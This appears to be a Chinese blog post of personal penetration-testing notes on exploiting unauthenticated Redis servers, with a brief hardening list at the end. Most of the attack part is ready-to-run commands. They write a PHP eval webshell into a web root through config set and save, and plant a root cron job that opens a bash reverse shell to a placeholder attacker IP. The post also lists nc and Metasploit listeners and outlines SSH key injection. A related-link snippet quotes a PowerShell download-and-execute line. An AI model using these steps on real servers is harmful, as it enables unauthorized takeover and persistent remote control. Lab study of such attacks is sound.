个人笔记-渗透测试-Redis未授权访问漏洞

已于 2024-05-31 21:37:51 修改
阅读量946 收藏 13
点赞数 19
分类专栏: 网安 文章标签: 笔记 redis 数据库 web安全
于 2024-05-29 22:05:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48162696/article/details/139300838
版权

Redis未授权访问漏洞

1,Redis常见用途

Remote Dictionary Service

//Redis相关操作
>set test 123
OK
>get test
"123"
>hset hash 1 a 2 b 3 c
(interger) 3
>hget hash 1
"a"

常见用途:

  • 缓存
  • 分布式session、分布式锁、分布式全局ID
  • 计数器、限流
  • 列表
  • 抽奖
  • 标签
  • 排行榜

Redis的优点:

  • 数据类型丰富、应用场景广泛
  • 纯内存的数据结构、读写速度快
  • 功能特性丰富(持久化、事务、多语言支持、集权分布式)

2,Redis环境安装

  1. 安装 gcc 依赖
    • Redis 是 C 语言编写的,编译需要 GCC。
      Redis6.x.x 版本支持了多线程,需要 gcc 的版本大于 4.9
    • 查看 gcc 的版本:
      gcc -v
    • 升级 gcc 版本:
      yum -y install centos-release-scl
yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++
devtoolset-9-binutils
scl enable devtoolset-9 bash
echo "source /opt/rh/devtoolset-9/enable" >>/etc/profile
  2. 下载 redis
    wget https://download.redis.io/releases/redis-6.2.3.tar.gz
  3. 解压压缩包
    tar -zxvf redis-6.2.3.tar.gz
  4. 编译安装
    cd redis-6.0.9/src
make install
  5. 修改redis.conf配置文件
    protected-mode ——保护模式
daemonize yes ——后台启动
bind 127.0.0.0 ——只能在本机访问,建议注释掉
requirepass yourpassword ——密码访问。注释掉则不需要密码登录
开启6379端口
  6. 使用指定配置文件启动 Redis 服务端
    /usr/local/soft/redis-6.2.3/src/redis-server
/usr/local/soft/redis-6.2.3/redis.conf
  7. 进入客户端
    目录:/src/redis-cli
  8. 配置别名
    vim ~/.bashrc
alias redis='/usr/local/soft/redis-6.2.3/src/redis-server
/usr/local/soft/redis-6.2.3/redis.conf'
alias recli='/usr/local/soft/redis-6.2.3/src/redis-cli'
    source ~/.bashrc

3,Redis持久化机制

如何保证数据不丢失?
答:内存的数据不定期保存到磁盘中。

  • RDB Redis DataBase
  • AOF Append Pnly File

自动触发配置:

  1. sava 3600 1 #自动触发规则
  2. dbfilename dump.rdb #文件名
  3. dir ./ #存储路径

手动触发保存命令:save / bgsave

4,Redis动态修改配置

config set:redis可以动态修改配置,重启以后失效

config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php

配合上持久化机制可以将任意内容写入到任意路径中。

5,webshell提权

  1. 完成配置后,向数据库中写入一句话木马
    set x <?php @eval($_POST["test"])?>

  2. 打开shell连接上木马

    //完整代码
redis-cli -h 192.168.142.13 -p 6379
config set dir /网站路径
config set dbfilename redis.php
flushall
set x <?php @eval($_POST["test"])?>
save

6,定时任务+反弹连接提权

  • 如果没有监听80端口的HTTP Server或者找不到网站本路径应该怎么办?

  • 反弹连接:受害者主机主动与攻击者取得连接,攻击者顺势控制靶机。

  • 以下情况使用反弹连接:

    1. 内网、私有IP
    2. IP动态变化
    3. 6379端口不允许入方向
    4. 一句话木马被杀软删除

  • 反弹连接的实现

    1. 控制机怎么监听一个端口?
    2. 靶机怎么连接到控制机的端口?

  • 常见监听端口方式

    类型命令
    netcat(ncat)nc -lvp 端口号 (-nlvp lvvp)
    msfmsfconsole;use exploit/multi/handler;set payload php/meterpreter/reverse_tcp;set lhost IP地址;set lport 端口号;run
    socatsocat TCP-LISTEN:端口号 -

  • 常见建立反弹连接的方式(靶机执行)
    在这里插入图片描述
    在这里插入图片描述

  • 看机器有什么环境,通过命令直接连接、或者访问代码文件

  • 如果连接失败,可以检查防火墙有没有关闭

  • 总结

    • 流程
      1. 监听端口
      2. 执行命令,或者上传payload访问,建立连接
    • 怎么上传?
      1. 文件上传漏洞
      2. 写入文件:Mysql、Rdis、CMS
      3. 文本编辑命令:tee、test.py
    • 怎么执行?
      1. 访问
      2. 定时任务自动触发

  • 定时任务
    crontab——cron表达式——秒分时日月周年
    在这里插入图片描述
    cron文件存储路径:

    • /var/spool/cron——此文件负责安排由系统管理员指定的维护系统以及其他任务的crontab
    • /etc/crontab.——放到是对应周期的任务dalily、hourly、monthly、weekly

  • 加入定时任务的漏洞复现:

    • kali机
      redis-cli -h 靶机地址 -p 6379
flushall
set x "\n* * * * * bash -i >& /dev/tcp/控制机的IP/6666 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
    • 控制机
      nc -lvp 6666

7,SSH key免密登录

免密登录流程:

  1. 客户端生成密钥对(公钥,私钥)
  2. 客户端把公钥发给服务端保存(正常情况需要密码)
  3. 客户端用私钥加密消息,发给服务端
  4. 服务端用公钥解密,解密成功,说明密钥匹配
  5. 客户端免密登录成功

操作流程:

  1. 生成密钥:ssh-keygen
  2. 登录目标发送公钥:ssh-copy-id root@目标IP
  3. 免密登录:ssh -i ./id_rsa root@目标IP

攻击方式:通过redis免密向目标发送公钥,再通过ssh进行连接。

其他利用方式:

  • 基于主从复制的RCE
  • jackson 反序列化利用
  • lua RCE
  • Redis密码爆破

8,Redis加固方案

  1. 限制访问IP
  2. 修改默认端口
  3. 使用密码访问
  4. 不要用root运行Redis
W_lanlanlu
关注
  • 19
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1161
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
windows环境redis授权利用手法总结
2401_84466336的博客
05-29 1349
redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次,这样就不需要重启机器就能获取权限了。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
redis授权漏洞复现
m0_60870041的博客
12-16 640
redis授权复现
面试经典 Redis授权漏洞与组合拳
jennycisp的博客
10-24 121
Redis 全称 Remote Dictionary Server(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10),版本更新参见常用版本包括。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
记一次渗透测试信息收集之swagger-ui授权
爱玩游戏的黑客的博客
12-20 2710
信息收集之swagger-ui授权
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
liuhyusb的博客
08-31 99
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis笔记-尚硅谷周阳V1.3-脑图
06-16
根据《Redis笔记-尚硅谷周阳V1.3》整理,脑图、思维导图xmind
Redis授权访问配合SSH key文件利用详解
09-09
3. 使用`redis-cli`连接到暴露的Redis实例,并将公钥内容设置为一个键的值。 4. 修改Redis的`dir`配置以指向`/root/.ssh/`目录,并设置`dbfilename`为`authorized_keys`。 5. 保存更改,这样公钥就会被写入`...
spring-session-data-redis-2.0.4.RELEASE-API文档-中英对照版.zip
06-12
赠送jar包:spring-session-data-redis-2.0.4.RELEASE.jar; 赠送原API文档:spring-session-data-redis-2.0.4.RELEASE-javadoc.jar; 赠送源代码:spring-session-data-redis-2.0.4.RELEASE-sources.jar; 赠送...
RedisWindows环境下Getshell
3569
08-07 5454
https://uknowsec.cn/posts/notes/Redis%E5%9C%A8Windows%E7%8E%AF%E5%A2%83%E4%B8%8BGetshell.html 虽说利用过程得 重启,我觉得 还有一种就是 利用钓鱼吧,直接在桌面生成一个 windows updade.dat 或者一些诱导性质的文件名让用户点击,就是稍微不靠谱点 0.0 环境搭建 windows版本...
Redis授权漏洞复现及利用(window,linux)
dreamthe的博客
03-22 1万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
redis渗透中的getshell问题总结
热门推荐
Exploit的小站~
05-10 2万+
 0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 ...
渗透测试 | Redis渗透
jklbnm12的博客
10-09 1191
Redis 0x01 简介 REmote DIctionary Server(Redis)是一个由 Salvatore Sanfilippo写的key-value存储系统。 Redis是—个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于內存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APl。它通常被称为数据结构服务器,因为值(value)可以是字符串(String),哈希(Map),列表(List),集合(sets)和有序集合(sorted sets)等类型。从2010年
【OpenCV C++20 学习笔记】给图片加边框-copyMakeBorder
TeamLee的博客
08-06 569
简单介绍在OpenCV中如何用copyMakeBorder的方法给图片添加边框
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
最新发布
B6665X的博客
08-06 407
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
尚硅谷谷粒商城项目笔记——三、安装docker【电脑CPU:AMD】
B6665X的博客
08-06 921
尚硅谷谷粒商城项目笔记——三、安装docker 电脑CPU:AMD
学习笔记第十九天
m0_69699758的博客
08-05 930
标准输入(stdin):默认是指键盘输入。标准输出(stdout):默认是指显示器输出。标准错误(stderr):用于输出错误信息,也是指向显示器,但与stdout不同,stderr通常是无缓冲的,以确保错误信息能立即显示。
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis安全补丁,以修复已知漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值